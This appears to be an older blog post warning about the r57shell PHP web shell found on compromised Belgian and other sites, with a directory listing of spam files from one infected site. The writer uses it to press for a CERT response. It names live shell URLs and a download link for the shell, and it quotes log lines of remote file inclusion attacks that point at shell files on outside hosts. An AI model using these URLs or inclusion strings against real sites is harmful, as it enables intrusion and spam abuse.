A secure democratic Net is a fundamental right

It is a russian script that is used to attack other sites

o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version 1.31 ]---o

but it can also be found here  http://www.filekeeper.org/download/shared/r57shell.php — 79.5 Kb

This is what is looks like (you can click on it for a bigger image)

Ok this script is for the moment on the following Belgian sites

------------------------------------------------------------

1. http://www.breast-reduction.be/~willboar/r57.php?tmp

in this case the file also shows what (also illegal content) was added to the site

total 14256
 01-Soundtrack_NFS_Most_Wanted.mp3
15996173 -rw-r--r--   1 willboar willboar     203 Jun 24 02:29 buy-viagra-cheap-drug.html
15996646 -rw-r--r--   1 willboar willboar      15 Jun 29 13:50 buzul.html
15995453 -rw-r--r--   1 willboar willboar  152958 Jun 18 11:44 c00.php
15996137 -rw-r--r--   1 willboar willboar  161828 Jun  9 23:27 c100.php
16007195 drwxr-xr-x   2 willboar willboar    4096 May 28 05:58 casino-1
15995607 -rw-r--r--   1 willboar willboar 4134512 Jun 17 17:19 Era-amen0.mp3
15991423 drwxr-xr-x   3 willboar willboar    4096 May 26 14:15 galeri
15992936 -rw-r--r--   1 willboar willboar 4152958 Jun 11 20:57 hbtsoundtrack.mp3
15992852 -rw-r--r--   1 willboar willboar       0 Jun 21 11:19 .htaccess
15992556 drwxr-xr-x   3 willboar willboar   12288 Jun 12 15:38 konsept arabalar,
15992557 drwxr-xr-x   2 willboar willboar    4096 Jun 21 07:49 modifiye
15995615 -rw-r--r--   1 willboar willboar   28273 Jun 17 17:19 necati_sasmaz.JPG
16007197 drwxr-xr-x   2 willboar willboar    4096 May 28 05:58 playonsports
16007192 drwxr-xr-x   3 willboar willboar    4096 Jul 31 11:15 protoolshack
15996130 -rw-r--r--   1 willboar willboar  103888 Jun 11 12:11 r57.php
16007170 drwxr-xr-x   2 willboar willboar   28672 Jun 19 11:47 spy
16007193 drwxr-xr-x   2 willboar willboar    4096 May 28 05:58 tramadol4less
15992558 drwxr-xr-x   3 willboar willboar    4096 May 27 19:50 video

------------------------------------------------------------

another Belgian one (a travel operator I think, probably on holiday :)

2. http://www.vip-apt.be/templates/gingervip/index.php (an example that the templates of Joomla are an open door - anything goes....)

------------------------------------------------------------

 as this log show from a fully spammed site (bulletin board that is) these scripts on other sites are being used to attack other sites (for example this guestbook with links to spam and illegal stuff that they placed before on other sites and interactive functions like forums and guestbooks

5:50pm/start.php?page=http:/209.250.239.6/images/tmp/hack8/phpshells/Dx.txt ...... /camarchive.php?page=www.randomix.h18.ru/phpBB2/docs/r57.php ...
www.somatik.be/stats_report.php

if you don't believe me do a googledork site:somatik.be sex 

------------------------------------------------------------

so the sites hosting this script will be spammers and used to spam and will be blocked like spammers

as happened with this Belgian site that is blacklisted, well, by my blacklister

5:26pm1, 2, 22.22%, o---[ r57shell - http-shell by rst/ghc | http://rst.void.ru. 2, 1, 11.11%, ---[ r57shell - http-shell by rst/ghc ...
3. www.topfood.be/webstat/usage_200808.html

------------------------------------------------------------

this is another live one although not from Belgium, but it is not easy finding them with Google, you'llf have to find the r57 links in your logs to be sure. We don't have a cert so, who is going to get them down ? The administrators ? Make me :)

http://aquafitness.gr/~willboar/r57.php

You can offcourse looking at the scripts use these sites to attack any other site any other way as you may chose. So this could be a platform for cyberattacks.

anyone remembering that there is a cyberwar going up and down and on and a bit off and who knows restarting once ?

Where is the Belgian CERT ?

YOU ONLY HAVE YOURSELF AND EACH OTHER. NOBODY IS GOING TO HELP YOU. SO YOU HAVE TO PROTECT AND MONITOR AND PATCH YOUR MACHINES AND SITES Yourself. NOBODY IS THERE TO DEFEND YOU.

WE try to help you only a little bit  :) but that is nothing compared with what should be done.